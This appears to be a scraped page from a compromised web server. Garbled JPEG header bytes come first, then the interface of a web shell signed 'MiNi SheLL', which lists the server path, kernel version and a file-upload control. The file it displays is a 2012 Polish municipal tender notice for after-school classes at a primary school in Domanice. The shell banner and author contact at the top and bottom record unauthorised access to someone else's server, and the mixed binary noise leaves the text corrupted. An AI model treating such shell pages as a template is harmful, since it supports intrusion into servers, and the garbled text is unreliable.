JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120807/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120807/289066-N-2012.html

<p class="kh_header"><b>Domanice: Prowadzenie zajęć pozalekcyjnych i pozaszkolnych w ramach projektu pn. Szkoła równych szans - działanie 9.2 PO KL 
Szkoła Podstawowa im. Żołnierzy 1 p.p. Legionów Józefa Piłsudskiego w Olszycu Szlacheckim</b><br>
<b>Numer ogłoszenia: 289066 - 2012; data zamieszczenia: 07.08.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy , Domanice 52, 08-113 Domanice, woj. mazowieckie, tel. 025 6312982, faks 025 6312982.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> domanice.i-gmina.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Prowadzenie zajęć pozalekcyjnych i pozaszkolnych w ramach projektu pn. Szkoła równych szans - działanie 9.2 PO KL 
Szkoła Podstawowa im. Żołnierzy 1 p.p. Legionów Józefa Piłsudskiego w Olszycu Szlacheckim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1 w Szkole Podstawowej im. Żołnierzy 1 p.p. Legionów Józefa Piłsudskiego w Olszycu Szlacheckim. Opis zadania 1. 
Zamawiający przewiduje realizację zajęć pozalekcyjnych w łącznej ilości 1296 godzin.
CZĘŚĆ 1. Prowadzenie zajęć wykraczających poza podstawę programową, rozwijających umiejętności matematyczne w ilości 336 godz. w tym:
1. na poziomie kl. I 48 godz.
2. na poziomie kl. II 48 godz.
3. na poziomie kl. III 48 godz.
4. na poziomie kl. IV 48 godz.
5. na poziomie kl. V 48 godz. 
6. na poziomie kl. VI 96 godz. 
Zajęcia rozwijające umiejętności matematyczne prowadzone metodami aktywizującymi, wyrabiające u uczniów zdolności logicznego myślenia i wykorzystania zdobytej wiedzy w praktyce.   
CZĘŚĆ 2. Prowadzenie zajęć ortograficznych pn. Mistrz ortografii w ilości 240 godz. w tym:
1. na poziomie kl. I 40 godz.
2. na poziomie kl. II 40 godz.
3. na poziomie kl. III 40 godz.
4. na poziomie kl. IV 40 godz.
5. na poziomie kl. V 40 godz. 
6. na poziomie kl. VI 40 godz. 
Zajęcia pozalekcyjne rozwijające umiejętności z j. polskiego. Celem zajęć jest utrwalenie poprawnego pisania, przywiązywania większej wagi do poprawności ortograficznej i interpunkcyjnej wypowiedzi. Zajęcia prowadzone metodami aktywizującymi przy wykorzystaniu technik multimedialnych. 
CZĘŚĆ 3 - prowadzenie zajęć komputerowych na poziomie klas od IV do VI w ilości 56 godz. 
Zajęcia pozalekcyjne umożliwiające wyszukiwanie informacji rozszerzających wiedzę z różnych przedmiotów oraz dotyczących własnych zainteresowań. Zajęcia umożliwiające wykonywanie prac z wykorzystaniem programów dydaktycznych, programów graficznych jak również korzystania z zasobów Internetu.  
CZĘŚĆ 4. Prowadzenie zajęć koła przyrodniczego pt. Mały odkrywca  w ilości 96 godz. w tym:
1. na poziomie kl. od I do III 48 godz.
2. na poziomie kl. od IV do VI 48 godz.
Zajęcia pozalekcyjne, rozwijające zainteresowania przyrodnicze, zajęcia w grupach z wykorzystaniem technik multimedialnych, pozwalających poznanie krajobrazów: nadmorskiego i górskiego. Poznawanie okolicznej przyrody poprzez doświadczenia i zajęcia w terenie. 
CZĘŚĆ 5. Prowadzenie zajęć koła matematycznego pt. Wygrywasz Ty w ilości 96 godz. w tym:
1. na poziomie kl. od I do III 48 godz.
2. na poziomie kl. od IV do VI 48 godz.  
Zajęcia pozalekcyjne dla uczniów uzdolnionych matematycznie, uczniowie doskonalą swoje umiejętności matematyczne, rozwiązują nietypowe zadania matematyczne, poszerzają swoją wiedzę matematyczną poprzez zabawy z zadaniami tekstowymi.   
CZĘŚĆ 6. Prowadzenie zajęć redakcyjnych w ilości 36 godz. dla uczniów klas od IV do VI.
Zajęcia pozalekcyjne,  rozwijające zainteresowania redakcyjne oraz  rozwijające umiejętności pisania różnych form wypowiedzi. 
CZĘŚĆ 7. Prowadzenie zajęć Koła języka angielskiego rozwijających umiejętności posługiwania się językiem angielskim w ilości 56 godz. na poziomie klas od IV do VI.
Zajęcia rozwijające umiejętności posługiwania się językiem angielskim w życiu codziennym. Rozbudzanie zainteresowań, wykorzystanie języka w praktyce, wykorzystanie różnych źródeł informacji.
CZĘŚĆ 8. Prowadzenie zajęć Koła języka rosyjskiego rozwijających umiejętności posługiwania się językiem rosyjskim w ilości 56 godz. na poziomie klas od IV do VI.
 Zajęcia rozbudzające zainteresowania, wykorzystanie języka w praktyce, wykorzystanie różnych źródeł informacji.   
CZĘŚĆ 9. Zajęcia socjoterapeutyczne w ilości 38 godz. 
Zajęcia dla uczniów mających trudności w kontaktach rówieśniczych, wzmacnianie poczucia własnej wartości,  radzenie sobie ze złością, agresją. Zajęcia prowadzone metodami aktywnymi.    
CZĘŚĆ 10. Zajęcia pozalekcyjne pn. Ocenianie kształtującego na zajęciach przyrodniczych w ilości 96 godz. w tym:
1. na poziomie kl. od I do III 48 godz.
2. na poziomie kl. od IV do VI 48 godz.
Wprowadzenie elementów oceniania kształtującego na zajęciach przyrodniczych. Celem zajęć będzie rozszerzenie i pogłębienie wiedzy przyrodniczej uczniów. Zajęcia innowacyjne, prowadzone w większości metodą doświadczeń, pokazów przy użyciu pomocy dydaktycznych i obserwacji naturalnych zjawisk przyrodniczych.  Uczniowie poprzez bezpośrednią obserwację zapoznają się z różnymi gatunkami roślin i zwierząt oraz warunkami lokalnego środowiska przyrodniczego. Metody bezpośredniego poznawania przyrody będą dla uczniów szczególnie atrakcyjne i potrzebne. Celem innowacji będzie wykształcenie u uczniów postawy badacza przyrody.   
CZĘŚĆ 11. Zajęcia pozalekcyjne pn. Moja szkoła i moja miejscowość dawniej i dziś, metodą projektu w ilości 12 godz. na poziomie klas I od V do VI. 
 Prowadzenie wywiadów, fotografowanie, wyszukiwanie dokumentów i opracowywanie przy pomocy technik multimedialnych zebranych materiałów. 
CZĘŚĆ 12. Zajęcia pozalekcyjne pn. Bajkoterapia, metodą projektu w ilości 20 godz. na poziomie klas od I do III. 
Zajęcia warsztatowe poświęcone uzależnieniom współczesnego świata oparte na treści bajek, baśni.  Celem warsztatów prowadzonych przez nauczyciela jest promocja zdrowego stylu życia, przestrzeganie przed skutkami spożywania alkoholu, palenia papierosów i zażywania narkotyków.    
CZĘŚĆ 13. Zajęcia pozalekcyjne pn. Zawody miejscowe w ilości 16 godz. oraz zajęcia z doradztwa zawodowego w ilości 2 godz. na poziomie klas od V do VI.
Zajęcia warsztatowe  na temat dalszego kształcenia w kontekście uwarunkowań regionalnego rynku pracy. Poradnictwo edukacyjno-zawodowe i zajęcia warsztatowe  nt. Mój styl myślenia i nauki, moje cechy charakteru. Czy znam swoje umiejętności i predyspozycje zawodowe.     
CZĘŚĆ 14. Zajęcia pozalekcyjne pn. Pomoc psychologiczna dla uczniów w ilości 64 godz. na poziomie klas od IV do VI. 
W ramach zajęć terapia psychologiczna dla uczniów z rodzin dysfunkcyjnych, zapobieganie syndromowi DDA, pomoc w pokonywaniu ograniczeń psychologicznych, leczenie zaburzeń nerwicowych. 
CZĘŚĆ 15. Prowadzenie zajęć z logopedii  w ilości 76 godz. na poziomie klas od I do III. 
Udział uczniów w terapii logopedycznej, mającej na celu korygowanie i usuwanie wad i zaburzeń wymowy. 
Użyte określenie godzina oznacza godzinę lekcyjną 45 minut oraz w przypadku zajęć pomocy psychologicznej uczniom oraz zajęć logopedycznych  godzinę zegarową 60 minut..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.20.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 15.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki dotyczące: 
1. posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania,
2. posiadania wiedzy,
3.dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia,
4. sytuacji ekonomicznej i finansowej.
Zamawiający dokona  oceny spełnienia warunków  na podstawie złożonych n/w oświadczeń i dokumentów  zgodnie z formułą spełnia, nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>kserokopie dyplomów ukończenia studiów wyższych potwierdzające wykształcenie wyższe kierunkowe - zgodnie z zasadą zgodności wykształcenia wyższego z nauczanym przedmiotem, określoną w Rozporządzeniu Ministra Edukacji Narodowej z dnia 12.03.2009, w sprawie szczegółowych kwalifikacji wymaganych od nauczycieli oraz określenia szkół i wypadków, w których można zatrudnić nauczycieli niemających wyższego wykształcenia lub ukończonego zakładu kształcenia nauczycieli, (Dz. U. Nr 50, poz. 400)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- Oświadczenie o spełnieniu warunków z art.22 ust.1 ustawy Pzp
- Kserokopie dyplomów ukończenia studiów wyższych potwierdzających wykształcenie
- Zaświadczenie o posiadanym przygotowaniu pedagogicznym</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> domanice.i-gmina.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Domanice
Domanice 52
08-113 Domanice.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.08.2012 godzina 09:00, miejsce: Urząd Gminy Domanice
Domanice 52
08-113 Domanice
sala konferencyjna.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt finansowany w ramach projektu pn. Szkoła równych szans - działanie 9.2 PO KL.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com